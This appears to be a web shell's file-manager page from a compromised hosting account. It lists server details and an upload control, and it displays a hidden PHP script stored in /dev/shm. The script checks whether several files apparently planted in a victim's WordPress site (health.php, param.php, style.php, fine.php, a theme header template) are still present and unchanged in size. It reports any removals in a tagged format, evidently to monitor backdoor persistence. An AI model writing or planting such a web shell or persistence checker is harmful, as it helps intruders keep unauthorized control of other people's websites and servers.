HEX
Server: LiteSpeed
System: Linux premium313.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User: wekawqug (1662)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //proc/self/root/dev/shm/.desc
<?php   $r = '/home/studukfa/varaprasadchilumula.in'; $x = ["/health.php"=>"bd@@229964453@@699",
"/param.php"=>"bd@@229964456@@751",
"/style.php"=>"bd@@229964462@@827",
"/fine.php"=>"bd@@229964450@@960",
"/wp-content/themes/navein/template-parts/header/responsive-header.php"=>"bd@@227955998@@1447"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');